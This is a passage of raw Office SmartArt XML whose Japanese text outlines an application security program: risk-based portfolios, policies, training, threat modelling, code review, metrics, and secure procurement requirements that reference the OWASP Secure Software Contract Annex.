                <a:alphaOff val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2089829" y="106954"/>
        <a:ext cx="5448974" cy="1022029"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1092707" y="976"/>
          <a:ext cx="94183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ja-JP" altLang="en-US" sz="1050" b="1" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>はじめに</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1138683" y="46952"/>
        <a:ext cx="849881" cy="1142031"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29555282-7DBF-4954-82C2-561252AD070F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4235194" y="-818832"/>
          <a:ext cx="115236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ビジネスの観点から</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>アプリケーションポートフォリオの保護の必要性</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>を特定します。これは、保護されるデータ資産に関連するプライバシー法やその他の規制によって一部は実現されます。</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組織のリスク耐性を踏まえた一貫性のあるリスク発生可能性と影響度の定義した共通の</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>リスク評価モデル</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>を確立します。</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すべてのアプリケーションと</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>API</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>を測定し、優先順位付けを行います。結果を</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>CMDB</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>に追加します。</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範囲と厳密さのレベルを適切に設定するために、品質保証ガイドラインを確立します。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2087855" y="1441015"/>
        <a:ext cx="5447044" cy="1039857"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1092707" y="1343951"/>
          <a:ext cx="93889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ja-JP" altLang="en-US" sz="1050" b="1" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>リスクベースポートフォリオアプローチ</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1138540" y="1389784"/>
        <a:ext cx="847227" cy="1142317"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4264473" y="524142"/>
          <a:ext cx="109380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全ての開発チームが遵守すべきアプリケーションセキュリティのベースラインを定義した</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t>組織の方針と標準</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>を確立します。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="120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これらの方針と標準を補完する</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId7"/>
            </a:rPr>
            <a:t>再利用可能なセキュリティ制御</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>を定義し、それらを使用する際の設計開発ガイドラインを提供します。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="120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様々な開発の役割やトピックからなる</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>アプリケーションセキュリティのトレーニングカリキュラム</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>を確立します。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2084995" y="2810410"/>
        <a:ext cx="5452762" cy="987016"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094375" y="2686926"/>
          <a:ext cx="93889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ja-JP" altLang="en-US" sz="1050" b="1" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>強力な基礎の作り上げ</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1140208" y="2732759"/>
        <a:ext cx="847227" cy="1142317"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4348118" y="1866158"/>
          <a:ext cx="92651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hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>セキュリティ実装</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>と</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId10"/>
            </a:rPr>
            <a:t>検証</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>の作業を定義し、既存の開発と運用プロセスに統合します。作業には、</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId11"/>
            </a:rPr>
            <a:t>脅威モデリング</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>、セキュアな</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId12"/>
            </a:rPr>
            <a:t>設計と設計レビュー</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>、セキュアなコーディングと</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId13"/>
            </a:rPr>
            <a:t>コードレビュー</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>、</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId14"/>
            </a:rPr>
            <a:t>ペネトレーションテスト</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>、修正作業を含みます。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="120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開発及びプロジェクトチームが成功するように専門家（</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>SME</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>）と</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t>サポートサービス</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>を提供します。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2076830" y="4227904"/>
        <a:ext cx="5469094" cy="836059"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1092707" y="4029901"/>
          <a:ext cx="938893" cy="1232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ja-JP" altLang="en-US" sz="1050" b="1" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>セキュリティを既存プロセスに統合</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1138540" y="4075734"/>
        <a:ext cx="847227" cy="1140399"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4258928" y="3207215"/>
          <a:ext cx="110489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定数的管理を実施します。改良と、収集した数値と分析データに基づく改善及び資金調達を実施します。数値には、セキュリティプラクティスとアクティビティの遵守、検出された脆弱性、緩和された脆弱性、アプリケーションの範囲、タイプとインスタンスによる欠陥密度等を含みます。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="120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企業全体での戦略的、システマティックな改善を目的とした根本的な原因と脆弱性のパターンを発見するために実装と確認の作業から得たデータを分析します。失敗から学び、改善を進める積極的なインセンティブを提供します。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2085538" y="5488479"/>
        <a:ext cx="5451678" cy="997023"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1092707" y="5370958"/>
          <a:ext cx="938893" cy="1232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endParaRPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1138540" y="5416791"/>
        <a:ext cx="847227" cy="11403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523715" y="-2186944"/>
          <a:ext cx="926552"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全てのデータ資産における機密性、真正性、完全性及び可用性や予想されるビジネスロジックに関する保護要件を含む、アプリケーションに対するビジネス要件を収集し、交渉する。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機能及び非機能のセキュリティ要件を含む、技術的な要件を蓄積する。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セキュリティに関する活動を含む、設計、ビルド、テスト及び運用の全ての側面をカバー可能な予算を計画し、交渉する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1317069" y="110164"/>
        <a:ext cx="5339845" cy="836090"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="1907"/>
          <a:ext cx="1115983" cy="105260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ja-JP" altLang="en-US" sz="1050" b="1" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>リソース管理の要件</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="207238" y="53291"/>
        <a:ext cx="1013215" cy="949833"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29555282-7DBF-4954-82C2-561252AD070F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3426427" y="-969455"/>
          <a:ext cx="112112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noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>例えば、ソフトウェア開発ライフサイクルにおけるベストプラクディスといったセキュリティプログラムに関するガイドラインやセキュリティ要件をなど、社内外の開発者と要件を交渉する。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noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>計画と設計工程を含む、全ての技術要件の達成を評価する。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noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>設計、セキュリティ、サービスレベルアグリーメント（</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>SLA</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>）を含む技術的な要件を交渉する。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en-US" altLang="ja-JP" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>OWASP Secure Software Contract Annex</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>のような様式やチェックリストを適用する。 </a:t>
          </a:r>
          <a:br>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>注記</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>: OWASP Secure Software Contract Annex</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>は米国の契約法に基づいている。そのため、参照するに当たっては、弁護士に相談する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1326566" y="1239864"/>
        <a:ext cx="5320849" cy="1011669"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="1118209"/>
          <a:ext cx="1115983" cy="1254976"/>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kumimoji="1" lang="ja-JP" altLang="en-US" sz="1050" b="1" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>提案依頼書 </a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="1050" b="1" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
